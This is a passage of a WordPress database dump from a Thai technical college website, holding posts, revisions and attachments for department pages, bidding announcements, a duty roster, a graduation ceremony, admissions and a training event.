(1933, 3, '2018-03-22 11:10:56', '2018-03-22 04:10:56', '<img class=\"aligncenter wp-image-1923 size-full\" src=\"/wp-content/uploads/2018/03/19-3-2561-9-50-06.jpg\" alt=\"\" width=\"194\" height=\"243\" />\r\n\r\n<img class=\"aligncenter wp-image-1924\" src=\"/wp-content/uploads/2018/03/22-3-2561-9-49-18-300x79.jpg\" alt=\"\" width=\"386\" height=\"101\" />\r\n\r\n<img class=\"aligncenter wp-image-1928 size-full\" src=\"/wp-content/uploads/2018/03/22-3-2561-10-58-44.jpg\" alt=\"\" width=\"904\" height=\"630\" />\r\n\r\n<img class=\"aligncenter wp-image-1932\" src=\"/wp-content/uploads/2018/03/22-3-2561-11-09-40.jpg\" alt=\"\" width=\"950\" height=\"648\" />\r\n\r\n ', 'ช่างกล', '', 'inherit', 'closed', 'closed', '', '1912-revision-v1', '', '', '2018-03-22 11:10:56', '2018-03-22 04:10:56', '', 1912, 'http://www.technicrayong.ac.th/1912-revision-v1/', 0, 'revision', '', 0),
(1934, 3, '2018-03-22 11:11:54', '2018-03-22 04:11:54', '<img class=\"aligncenter wp-image-1923 size-full\" src=\"/wp-content/uploads/2018/03/19-3-2561-9-50-06.jpg\" alt=\"\" width=\"194\" height=\"243\" />\r\n\r\n<img class=\"aligncenter wp-image-1924\" src=\"/wp-content/uploads/2018/03/22-3-2561-9-49-18-300x79.jpg\" alt=\"\" width=\"386\" height=\"101\" />\r\n\r\n<img class=\"aligncenter wp-image-1928 size-full\" src=\"/wp-content/uploads/2018/03/22-3-2561-10-58-44.jpg\" alt=\"\" width=\"904\" height=\"630\" />\r\n\r\n<img class=\"aligncenter wp-image-1932\" src=\"/wp-content/uploads/2018/03/22-3-2561-11-09-40.jpg\" alt=\"\" width=\"965\" height=\"659\" />\r\n\r\n ', 'ช่างกล', '', 'inherit', 'closed', 'closed', '', '1912-revision-v1', '', '', '2018-03-22 11:11:54', '2018-03-22 04:11:54', '', 1912, 'http://www.technicrayong.ac.th/1912-revision-v1/', 0, 'revision', '', 0),
(1939, 3, '2018-03-22 11:23:23', '2018-03-22 04:23:23', '<img class=\"aligncenter wp-image-1923 size-full\" src=\"/wp-content/uploads/2018/03/19-3-2561-9-50-06.jpg\" alt=\"\" width=\"194\" height=\"243\" />\r\n\r\n<img class=\"aligncenter wp-image-1924\" src=\"/wp-content/uploads/2018/03/22-3-2561-9-49-18-300x79.jpg\" alt=\"\" width=\"386\" height=\"101\" />\r\n\r\n<img class=\"aligncenter wp-image-1928 size-full\" src=\"/wp-content/uploads/2018/03/22-3-2561-10-58-44.jpg\" alt=\"\" width=\"904\" height=\"630\" />\r\n\r\n<img class=\"aligncenter wp-image-1938 size-full\" src=\"/wp-content/uploads/2018/03/6666655555.jpg\" alt=\"\" width=\"957\" height=\"639\" />', 'ช่างกล', '', 'inherit', 'closed', 'closed', '', '1912-revision-v1', '', '', '2018-03-22 11:23:23', '2018-03-22 04:23:23', '', 1912, 'http://www.technicrayong.ac.th/1912-revision-v1/', 0, 'revision', '', 0),
(1941, 3, '2018-03-22 11:27:00', '2018-03-22 04:27:00', '<img class=\"aligncenter wp-image-1923 size-full\" src=\"/wp-content/uploads/2018/03/19-3-2561-9-50-06.jpg\" alt=\"\" width=\"194\" height=\"243\" />\r\n\r\n<img class=\"aligncenter wp-image-1924\" src=\"/wp-content/uploads/2018/03/22-3-2561-9-49-18-300x79.jpg\" alt=\"\" width=\"386\" height=\"101\" />\r\n\r\n<img class=\"aligncenter wp-image-1928 size-full\" src=\"/wp-content/uploads/2018/03/22-3-2561-10-58-44.jpg\" alt=\"\" width=\"904\" height=\"630\" />\r\n\r\n<img class=\"aligncenter wp-image-1940 size-full\" src=\"/wp-content/uploads/2018/03/4444455555.jpg\" alt=\"\" width=\"955\" height=\"634\" />', 'ช่างกล', '', 'inherit', 'closed', 'closed', '', '1912-revision-v1', '', '', '2018-03-22 11:27:00', '2018-03-22 04:27:00', '', 1912, 'http://www.technicrayong.ac.th/1912-revision-v1/', 0, 'revision', '', 0),
(1942, 3, '2018-03-22 11:29:09', '2018-03-22 04:29:09', '', '111111111', '', 'inherit', 'closed', 'closed', '', '111111111', '', '', '2018-03-22 11:29:09', '2018-03-22 04:29:09', '', 1912, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/03/111111111.jpg', 0, 'attachment', 'image/jpeg', 0),
(1943, 3, '2018-03-22 11:29:27', '2018-03-22 04:29:27', '<img class=\"aligncenter wp-image-1923 size-full\" src=\"/wp-content/uploads/2018/03/19-3-2561-9-50-06.jpg\" alt=\"\" width=\"194\" height=\"243\" />\r\n\r\n<img class=\"aligncenter wp-image-1924\" src=\"/wp-content/uploads/2018/03/22-3-2561-9-49-18-300x79.jpg\" alt=\"\" width=\"386\" height=\"101\" />\r\n\r\n<img class=\"aligncenter wp-image-1928 size-full\" src=\"/wp-content/uploads/2018/03/22-3-2561-10-58-44.jpg\" alt=\"\" width=\"904\" height=\"630\" />\r\n\r\n<img class=\"aligncenter wp-image-1942 size-full\" src=\"/wp-content/uploads/2018/03/111111111.jpg\" alt=\"\" width=\"956\" height=\"627\" />', 'ช่างกล', '', 'inherit', 'closed', 'closed', '', '1912-revision-v1', '', '', '2018-03-22 11:29:27', '2018-03-22 04:29:27', '', 1912, 'http://www.technicrayong.ac.th/1912-revision-v1/', 0, 'revision', '', 0),
(1944, 3, '2018-03-22 11:53:29', '2018-03-22 04:53:29', '', '546+56+452645', '', 'inherit', 'closed', 'closed', '', '54656452645', '', '', '2018-03-22 11:53:29', '2018-03-22 04:53:29', '', 1848, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/03/54656452645.jpg', 0, 'attachment', 'image/jpeg', 0),
(1946, 3, '2018-03-22 11:54:48', '2018-03-22 04:54:48', '', '11111116666666', '', 'inherit', 'closed', 'closed', '', '11111116666666', '', '', '2018-03-22 11:54:48', '2018-03-22 04:54:48', '', 1848, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/03/11111116666666.jpg', 0, 'attachment', 'image/jpeg', 0),
(1947, 3, '2018-03-22 11:55:17', '2018-03-22 04:55:17', '<img class=\"aligncenter size-full wp-image-1904\" src=\"/wp-content/uploads/2018/03/14-3-2561-15-44-03.jpg\" alt=\"\" width=\"194\" height=\"242\" />\r\n\r\n<img class=\"aligncenter wp-image-1905\" src=\"/wp-content/uploads/2018/03/14-3-2561-15-44-26-300x82.jpg\" alt=\"\" width=\"376\" height=\"103\" />\r\n\r\n<img class=\"aligncenter wp-image-1944 size-full\" src=\"/wp-content/uploads/2018/03/54656452645.jpg\" alt=\"\" width=\"954\" height=\"629\" />\r\n\r\n<img class=\"aligncenter wp-image-1946 size-full\" src=\"/wp-content/uploads/2018/03/11111116666666.jpg\" alt=\"\" width=\"952\" height=\"624\" />', 'ช่างยนต์', '', 'inherit', 'closed', 'closed', '', '1848-revision-v1', '', '', '2018-03-22 11:55:17', '2018-03-22 04:55:17', '', 1848, 'http://www.technicrayong.ac.th/1848-revision-v1/', 0, 'revision', '', 0),
(1948, 3, '2018-03-22 11:58:35', '2018-03-22 04:58:35', '', '2222222', '', 'inherit', 'closed', 'closed', '', '2222222', '', '', '2018-03-22 11:58:35', '2018-03-22 04:58:35', '', 1848, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/03/2222222.jpg', 0, 'attachment', 'image/jpeg', 0),
(1949, 3, '2018-03-22 11:59:11', '2018-03-22 04:59:11', '<img class=\"aligncenter size-full wp-image-1904\" src=\"/wp-content/uploads/2018/03/14-3-2561-15-44-03.jpg\" alt=\"\" width=\"194\" height=\"242\" />\r\n\r\n<img class=\"aligncenter wp-image-1905\" src=\"/wp-content/uploads/2018/03/14-3-2561-15-44-26-300x82.jpg\" alt=\"\" width=\"376\" height=\"103\" />\r\n\r\n<img class=\"aligncenter wp-image-1944 size-full\" src=\"/wp-content/uploads/2018/03/54656452645.jpg\" alt=\"\" width=\"954\" height=\"629\" />\r\n\r\n<img class=\"aligncenter wp-image-1946 size-full\" src=\"/wp-content/uploads/2018/03/11111116666666.jpg\" alt=\"\" width=\"952\" height=\"624\" />\r\n\r\n<img class=\"aligncenter wp-image-1948 size-full\" src=\"/wp-content/uploads/2018/03/2222222.jpg\" alt=\"\" width=\"954\" height=\"559\" />', 'ช่างยนต์', '', 'inherit', 'closed', 'closed', '', '1848-revision-v1', '', '', '2018-03-22 11:59:11', '2018-03-22 04:59:11', '', 1848, 'http://www.technicrayong.ac.th/1848-revision-v1/', 0, 'revision', '', 0);
INSERT INTO `wp_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(1950, 3, '2018-03-22 11:59:21', '2018-03-22 04:59:21', '<img class=\"aligncenter size-full wp-image-1904\" src=\"/wp-content/uploads/2018/03/14-3-2561-15-44-03.jpg\" alt=\"\" width=\"194\" height=\"242\" />\r\n\r\n<img class=\"aligncenter wp-image-1905\" src=\"/wp-content/uploads/2018/03/14-3-2561-15-44-26-300x82.jpg\" alt=\"\" width=\"376\" height=\"103\" />\r\n\r\n<img class=\"aligncenter wp-image-1944 size-full\" src=\"/wp-content/uploads/2018/03/54656452645.jpg\" alt=\"\" width=\"954\" height=\"629\" />\r\n\r\n<img class=\"aligncenter wp-image-1946 size-full\" src=\"/wp-content/uploads/2018/03/11111116666666.jpg\" alt=\"\" width=\"952\" height=\"624\" />\r\n\r\n<img class=\"aligncenter wp-image-1948 size-full\" src=\"/wp-content/uploads/2018/03/2222222.jpg\" alt=\"\" width=\"954\" height=\"559\" />', 'ช่างยนต์', '', 'inherit', 'closed', 'closed', '', '1848-autosave-v1', '', '', '2018-03-22 11:59:21', '2018-03-22 04:59:21', '', 1848, 'http://www.technicrayong.ac.th/1848-autosave-v1/', 0, 'revision', '', 0),
(1951, 3, '2018-03-22 12:04:01', '2018-03-22 05:04:01', '[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F03%2Fe-bidding-winner-4-objects.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]', 'ประกาศ รายชื่อผู้ชนะการเสนอราคาประกวดราคาซื้อครุภัณฑ์การศึกษา จำนวน 4 รายการ โดยวิธีประกวดราคาอิเล็กทรอนิกส์ (e-bidding)', '', 'publish', 'closed', 'open', '', '%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%81%e0%b8%b2%e0%b8%a8-%e0%b8%a3%e0%b8%b2%e0%b8%a2%e0%b8%8a%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%9c%e0%b8%b9%e0%b9%89%e0%b8%8a%e0%b8%99%e0%b8%b0%e0%b8%81%e0%b8%b2%e0%b8%a3', '', '', '2018-03-22 12:04:01', '2018-03-22 05:04:01', '', 0, 'http://www.technicrayong.ac.th/?p=1951', 443, 'post', '', 0),
(1953, 3, '2018-03-22 12:03:32', '2018-03-22 05:03:32', '', 'e-bidding winner 4 objects', '', 'inherit', 'closed', 'closed', '', 'e-bidding-winner-4-objects', '', '', '2018-03-22 12:03:32', '2018-03-22 05:03:32', '', 1951, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/03/e-bidding-winner-4-objects.pdf', 0, 'attachment', 'application/pdf', 0),
(1954, 3, '2018-03-22 12:04:01', '2018-03-22 05:04:01', '[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F03%2Fe-bidding-winner-4-objects.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]', 'ประกาศ รายชื่อผู้ชนะการเสนอราคาประกวดราคาซื้อครุภัณฑ์การศึกษา จำนวน 4 รายการ โดยวิธีประกวดราคาอิเล็กทรอนิกส์ (e-bidding)', '', 'inherit', 'closed', 'closed', '', '1951-revision-v1', '', '', '2018-03-22 12:04:01', '2018-03-22 05:04:01', '', 1951, 'http://www.technicrayong.ac.th/1951-revision-v1/', 0, 'revision', '', 0),
(1955, 3, '2018-03-23 12:26:34', '2018-03-23 05:26:34', '[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F03%2F%E0%B9%80%E0%B8%A7%E0%B8%A3%E0%B9%80%E0%B8%94%E0%B8%B7%E0%B8%AD%E0%B8%99%E0%B9%80%E0%B8%A1%E0%B8%A9%E0%B8%B2%E0%B8%A2%E0%B8%992561.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]', 'ตารางเวร เดือนเมษายน 2561', '', 'publish', 'closed', 'open', '', '%e0%b8%95%e0%b8%b2%e0%b8%a3%e0%b8%b2%e0%b8%87%e0%b9%80%e0%b8%a7%e0%b8%a3-%e0%b9%80%e0%b8%94%e0%b8%b7%e0%b8%ad%e0%b8%99%e0%b9%80%e0%b8%a1%e0%b8%a9%e0%b8%b2%e0%b8%a2%e0%b8%99-2561', '', '', '2018-03-23 12:26:34', '2018-03-23 05:26:34', '', 0, 'http://www.technicrayong.ac.th/?p=1955', 442, 'post', '', 0),
(1956, 3, '2018-03-23 12:26:01', '2018-03-23 05:26:01', '', 'เวรเดือนเมษายน2561', '', 'inherit', 'closed', 'closed', '', '%e0%b9%80%e0%b8%a7%e0%b8%a3%e0%b9%80%e0%b8%94%e0%b8%b7%e0%b8%ad%e0%b8%99%e0%b9%80%e0%b8%a1%e0%b8%a9%e0%b8%b2%e0%b8%a2%e0%b8%992561', '', '', '2018-03-23 12:26:01', '2018-03-23 05:26:01', '', 1955, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/03/เวรเดือนเมษายน2561.pdf', 0, 'attachment', 'application/pdf', 0),
(1957, 3, '2018-03-23 12:26:34', '2018-03-23 05:26:34', '[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F03%2F%E0%B9%80%E0%B8%A7%E0%B8%A3%E0%B9%80%E0%B8%94%E0%B8%B7%E0%B8%AD%E0%B8%99%E0%B9%80%E0%B8%A1%E0%B8%A9%E0%B8%B2%E0%B8%A2%E0%B8%992561.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]', 'ตารางเวร เดือนเมษายน 2561', '', 'inherit', 'closed', 'closed', '', '1955-revision-v1', '', '', '2018-03-23 12:26:34', '2018-03-23 05:26:34', '', 1955, 'http://www.technicrayong.ac.th/1955-revision-v1/', 0, 'revision', '', 0),
(1958, 3, '2018-03-26 10:49:03', '2018-03-26 03:49:03', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3D561428104233382%26id%3D100010985913485&width=500\" width=\"500\" height=\"702\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'พิธีมอบประกาศนียบัตรแก่ผู้สำเร็จการศึกษา ระดับประกาศนียบัตรวิชาชีพ และ ระดับประกาศนียบัตรวิชาชีพชั้นสูง ประจำปีการศึกษา 2560 เมื่อวันศุกร์ที่ 23 มีนาคม 2561 ที่ผ่านมา ณ ห้องสร้อยเพชร โรงแรมโกลเด้นซิตี้ จังหวัดระยอง', '', 'publish', 'closed', 'open', '', '%e0%b8%9e%e0%b8%b4%e0%b8%98%e0%b8%b5%e0%b8%a1%e0%b8%ad%e0%b8%9a%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%81%e0%b8%b2%e0%b8%a8%e0%b8%99%e0%b8%b5%e0%b8%a2%e0%b8%9a%e0%b8%b1%e0%b8%95%e0%b8%a3%e0%b9%81%e0%b8%81', '', '', '2018-03-26 10:49:03', '2018-03-26 03:49:03', '', 0, 'http://www.technicrayong.ac.th/?p=1958', 441, 'post', '', 0),
(1959, 3, '2018-03-26 10:48:24', '2018-03-26 03:48:24', '', '28953695_561424490900410_9004530260358522663_o', '', 'inherit', 'closed', 'closed', '', '28953695_561424490900410_9004530260358522663_o', '', '', '2018-03-26 10:48:24', '2018-03-26 03:48:24', '', 1958, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/03/28953695_561424490900410_9004530260358522663_o.jpg', 0, 'attachment', 'image/jpeg', 0),
(1960, 3, '2018-03-26 10:49:03', '2018-03-26 03:49:03', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3D561428104233382%26id%3D100010985913485&width=500\" width=\"500\" height=\"702\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'พิธีมอบประกาศนียบัตรแก่ผู้สำเร็จการศึกษา ระดับประกาศนียบัตรวิชาชีพ และ ระดับประกาศนียบัตรวิชาชีพชั้นสูง ประจำปีการศึกษา 2560 เมื่อวันศุกร์ที่ 23 มีนาคม 2561 ที่ผ่านมา ณ ห้องสร้อยเพชร โรงแรมโกลเด้นซิตี้ จังหวัดระยอง', '', 'inherit', 'closed', 'closed', '', '1958-revision-v1', '', '', '2018-03-26 10:49:03', '2018-03-26 03:49:03', '', 1958, 'http://www.technicrayong.ac.th/1958-revision-v1/', 0, 'revision', '', 0),
(1961, 3, '2018-03-26 10:54:09', '2018-03-26 03:54:09', 'กำหนดการรับสมัครนักศึกษาใหม่ ระดับปริญญาตรี หลักสูตรเทคโนโลยีบัณฑิต (ทล.บ.)\r\n- สาขาวิชาเทคโนโลยียานยนต์\r\n- สาขาวิชาเทคโนโลยีไฟฟ้า\r\n.\r\nรับสมัครตั้งแต่วันนี้-30 เมษายน 2561<span class=\"text_exposed_show\">\r\nเปิดภาคเรียน 19 พฤษภาคม 2561\r\n.\r\nสอบถามข้อมูลได้ที่ สถาบันการอาชีวศึกษาภาคตะวันออก (วิทยาลัยเทคนิคระยอง) เลขที่ 086-13 ถ.ตากสินมหาราช ต.ท่าประดู่ อ.เมือง จ.ระยอง 21000\r\nโทรศัพท์ 038-611192 ต่อ 225 , 038-616434\r\nโทรสาร 038-870717 , 038-616435</span>\r\n\r\n<img class=\"aligncenter wp-image-1962 size-full\" src=\"/wp-content/uploads/2018/03/29472837_559055741137285_2187482021297651712_o.jpg\" alt=\"\" width=\"1718\" height=\"1205\" />\r\n\r\n<img class=\"aligncenter wp-image-1963 size-full\" src=\"/wp-content/uploads/2018/03/29510989_559055757803950_3873064459421351936_o.jpg\" alt=\"\" width=\"1718\" height=\"1205\" />\r\n\r\n<img class=\"aligncenter wp-image-1964 size-full\" src=\"/wp-content/uploads/2018/03/29432516_559055814470611_4603448322693267456_o.jpg\" alt=\"\" width=\"1718\" height=\"1205\" />\r\n\r\n<img class=\"aligncenter wp-image-1965 size-full\" src=\"/wp-content/uploads/2018/03/29433243_559055711137288_7067969740471271424_o.jpg\" alt=\"\" width=\"1718\" height=\"1205\" />', 'กำหนดการรับสมัครนักศึกษาใหม่ ระดับปริญญาตรี หลักสูตรเทคโนโลยีบัณฑิต (ทล.บ.)', '', 'publish', 'closed', 'open', '', '%e0%b8%81%e0%b8%b3%e0%b8%ab%e0%b8%99%e0%b8%94%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b8%a3%e0%b8%b1%e0%b8%9a%e0%b8%aa%e0%b8%a1%e0%b8%b1%e0%b8%84%e0%b8%a3%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b8%a8%e0%b8%b6%e0%b8%81', '', '', '2018-03-26 10:54:09', '2018-03-26 03:54:09', '', 0, 'http://www.technicrayong.ac.th/?p=1961', 440, 'post', '', 0),
(1962, 3, '2018-03-26 10:51:23', '2018-03-26 03:51:23', '', '29472837_559055741137285_2187482021297651712_o', '', 'inherit', 'closed', 'closed', '', '29472837_559055741137285_2187482021297651712_o', '', '', '2018-03-26 10:51:23', '2018-03-26 03:51:23', '', 1961, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/03/29472837_559055741137285_2187482021297651712_o.jpg', 0, 'attachment', 'image/jpeg', 0),
(1963, 3, '2018-03-26 10:52:32', '2018-03-26 03:52:32', '', '29510989_559055757803950_3873064459421351936_o', '', 'inherit', 'closed', 'closed', '', '29510989_559055757803950_3873064459421351936_o', '', '', '2018-03-26 10:52:32', '2018-03-26 03:52:32', '', 1961, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/03/29510989_559055757803950_3873064459421351936_o.jpg', 0, 'attachment', 'image/jpeg', 0),
(1964, 3, '2018-03-26 10:52:52', '2018-03-26 03:52:52', '', '29432516_559055814470611_4603448322693267456_o', '', 'inherit', 'closed', 'closed', '', '29432516_559055814470611_4603448322693267456_o', '', '', '2018-03-26 10:52:52', '2018-03-26 03:52:52', '', 1961, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/03/29432516_559055814470611_4603448322693267456_o.jpg', 0, 'attachment', 'image/jpeg', 0),
(1965, 3, '2018-03-26 10:53:07', '2018-03-26 03:53:07', '', '29433243_559055711137288_7067969740471271424_o', '', 'inherit', 'closed', 'closed', '', '29433243_559055711137288_7067969740471271424_o', '', '', '2018-03-26 10:53:07', '2018-03-26 03:53:07', '', 1961, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/03/29433243_559055711137288_7067969740471271424_o.jpg', 0, 'attachment', 'image/jpeg', 0),
(1966, 3, '2018-03-26 10:54:09', '2018-03-26 03:54:09', 'กำหนดการรับสมัครนักศึกษาใหม่ ระดับปริญญาตรี หลักสูตรเทคโนโลยีบัณฑิต (ทล.บ.)\r\n- สาขาวิชาเทคโนโลยียานยนต์\r\n- สาขาวิชาเทคโนโลยีไฟฟ้า\r\n.\r\nรับสมัครตั้งแต่วันนี้-30 เมษายน 2561<span class=\"text_exposed_show\">\r\nเปิดภาคเรียน 19 พฤษภาคม 2561\r\n.\r\nสอบถามข้อมูลได้ที่ สถาบันการอาชีวศึกษาภาคตะวันออก (วิทยาลัยเทคนิคระยอง) เลขที่ 086-13 ถ.ตากสินมหาราช ต.ท่าประดู่ อ.เมือง จ.ระยอง 21000\r\nโทรศัพท์ 038-611192 ต่อ 225 , 038-616434\r\nโทรสาร 038-870717 , 038-616435</span>\r\n\r\n<img class=\"aligncenter wp-image-1962 size-full\" src=\"/wp-content/uploads/2018/03/29472837_559055741137285_2187482021297651712_o.jpg\" alt=\"\" width=\"1718\" height=\"1205\" />\r\n\r\n<img class=\"aligncenter wp-image-1963 size-full\" src=\"/wp-content/uploads/2018/03/29510989_559055757803950_3873064459421351936_o.jpg\" alt=\"\" width=\"1718\" height=\"1205\" />\r\n\r\n<img class=\"aligncenter wp-image-1964 size-full\" src=\"/wp-content/uploads/2018/03/29432516_559055814470611_4603448322693267456_o.jpg\" alt=\"\" width=\"1718\" height=\"1205\" />\r\n\r\n<img class=\"aligncenter wp-image-1965 size-full\" src=\"/wp-content/uploads/2018/03/29433243_559055711137288_7067969740471271424_o.jpg\" alt=\"\" width=\"1718\" height=\"1205\" />', 'กำหนดการรับสมัครนักศึกษาใหม่ ระดับปริญญาตรี หลักสูตรเทคโนโลยีบัณฑิต (ทล.บ.)', '', 'inherit', 'closed', 'closed', '', '1961-revision-v1', '', '', '2018-03-26 10:54:09', '2018-03-26 03:54:09', '', 1961, 'http://www.technicrayong.ac.th/1961-revision-v1/', 0, 'revision', '', 0),
(1969, 3, '2018-03-27 08:58:10', '2018-03-27 01:58:10', '<a href=\"/wp-content/uploads/2018/01/201801121551.jpg\"><img class=\"aligncenter wp-image-588\" src=\"/wp-content/uploads/2018/01/201801121551-725x1024.jpg\" alt=\"\" width=\"1080\" height=\"1526\" /></a>', 'ชี้แจงการประกวดราคาซื้อเครื่องมือประจำตัวผู้เรียน ตามเอกสารประกวดราคา ข้อ 4.5', '', 'inherit', 'closed', 'closed', '', '754-autosave-v1', '', '', '2018-03-27 08:58:10', '2018-03-27 01:58:10', '', 754, 'http://www.technicrayong.ac.th/754-autosave-v1/', 0, 'revision', '', 0),
(1970, 3, '2018-03-27 09:05:46', '2018-03-27 02:05:46', '', 'WebBoard', '', 'publish', 'closed', 'closed', '', 'webboard', '', '', '2018-08-14 14:51:08', '2018-08-14 07:51:08', '', 0, 'http://www.technicrayong.ac.th/?p=1970', 80, 'nav_menu_item', '', 0),
(1971, 3, '2018-03-27 09:05:46', '2018-03-27 02:05:46', '', 'Contact Us', '', 'publish', 'closed', 'closed', '', 'contract-us', '', '', '2018-08-14 14:51:08', '2018-08-14 07:51:08', '', 0, 'http://www.technicrayong.ac.th/?p=1971', 81, 'nav_menu_item', '', 0),
(1972, 3, '2018-03-28 09:18:37', '2018-03-28 02:18:37', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3D561918157517710%26id%3D100010985913485&width=500\" width=\"500\" height=\"780\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'สถาบันการอาชีวศึกษาภาคตะวันออก วิทยาลัยเทคนิคระยอง ร่วมกับมหาวิทยาลัยเทคโนโลยีพระจอมเกล้าพระนครเหนือ และกรมพัฒนาพลังงานทดแทนและอนุรักษ์พลังงาน ดำเนินการจัดฝึกอบรมการบำรุงรักษาเครื่องปรับอากาศ ภายใต้โครงการถ่ายทอดและเผยแพร่ความรู้การบำรุงรักษาเครื่องปรับอากาศ ในวิทยาลัยอาชีวศึกษา ให้แก่บุคลากรของวิทยาลัย และผู้ที่สนใจเข้าร่วมการฝึกอบรม วันอังคารที่ 27 มีนาคม 2561', '', 'publish', 'closed', 'open', '', '%e0%b8%aa%e0%b8%96%e0%b8%b2%e0%b8%9a%e0%b8%b1%e0%b8%99%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b8%ad%e0%b8%b2%e0%b8%8a%e0%b8%b5%e0%b8%a7%e0%b8%a8%e0%b8%b6%e0%b8%81%e0%b8%a9%e0%b8%b2%e0%b8%a0%e0%b8%b2%e0%b8%84', '', '', '2018-03-28 09:21:56', '2018-03-28 02:21:56', '', 0, 'http://www.technicrayong.ac.th/?p=1972', 439, 'post', '', 0),
(1973, 3, '2018-03-28 09:18:37', '2018-03-28 02:18:37', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3D561918157517710%26id%3D100010985913485&width=500\" width=\"500\" height=\"780\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'สถาบันการอาชีวศึกษาภาคตะวันออก วิทยาลัยเทคนิคระยอง ร่วมกับมหาวิทยาลัยเทคโนโลยีพระจอมเกล้าพระนครเหนือ และกรมพัฒนาพลังงานทดแทนและอนุรักษ์พลังงาน ดำเนินการจัดฝึกอบรมการบำรุงรักษาเครื่องปรับอากาศ ภายใต้โครงการถ่ายทอดและเผยแพร่ความรู้การบำรุงรักษาเครื่องปรับอากาศ ในวิทยาลัยอาชีวศึกษา ให้แก่บุคลากรของวิทยาลัย และผู้ที่สนใจเข้าร่วมการฝึกอบรม วันอังคารที่ 27 มีนาคม 2561', '', 'inherit', 'closed', 'closed', '', '1972-revision-v1', '', '', '2018-03-28 09:18:37', '2018-03-28 02:18:37', '', 1972, 'http://www.technicrayong.ac.th/1972-revision-v1/', 0, 'revision', '', 0),
(1974, 3, '2018-03-28 09:21:39', '2018-03-28 02:21:39', '', '29541022_561916284184564_5755067802129474950_n', '', 'inherit', 'closed', 'closed', '', '29541022_561916284184564_5755067802129474950_n', '', '', '2018-03-28 09:21:39', '2018-03-28 02:21:39', '', 1972, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/03/29541022_561916284184564_5755067802129474950_n.jpg', 0, 'attachment', 'image/jpeg', 0),
(1976, 3, '2018-03-29 13:38:19', '2018-03-29 06:38:19', '<a href=\"/%e0%b8%8a%e0%b9%88%e0%b8%b2%e0%b8%87%e0%b9%80%e0%b8%8a%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%a1/1-12/\"><img class=\"alignnone size-full wp-image-11873\" src=\"/wp-content/uploads/2021/06/1.png\" alt=\"\" width=\"3508\" height=\"2480\" /></a> <a href=\"/%e0%b8%8a%e0%b9%88%e0%b8%b2%e0%b8%87%e0%b9%80%e0%b8%8a%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%a1/2-9/\"><img class=\"alignnone size-full wp-image-11874\" src=\"/wp-content/uploads/2021/06/2.png\" alt=\"\" width=\"3508\" height=\"2480\" /></a>', 'ช่างเชื่อม', '', 'publish', 'closed', 'closed', '', '%e0%b8%8a%e0%b9%88%e0%b8%b2%e0%b8%87%e0%b9%80%e0%b8%8a%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%a1', '', '', '2021-06-28 10:49:46', '2021-06-28 03:49:46', '', 0, 'http://www.technicrayong.ac.th/?page_id=1976', 0, 'page', '', 0),
(1977, 3, '2018-03-29 13:36:57', '2018-03-29 06:36:57', '', '22-3-2561 16-31-27', '', 'inherit', 'closed', 'closed', '', '22-3-2561-16-31-27', '', '', '2018-03-29 13:36:57', '2018-03-29 06:36:57', '', 1976, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/03/22-3-2561-16-31-27.jpg', 0, 'attachment', 'image/jpeg', 0),
(1978, 3, '2018-03-29 13:37:01', '2018-03-29 06:37:01', '', '22-3-2561 16-33-39', '', 'inherit', 'closed', 'closed', '', '22-3-2561-16-33-39', '', '', '2018-03-29 13:37:01', '2018-03-29 06:37:01', '', 1976, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/03/22-3-2561-16-33-39.jpg', 0, 'attachment', 'image/jpeg', 0),
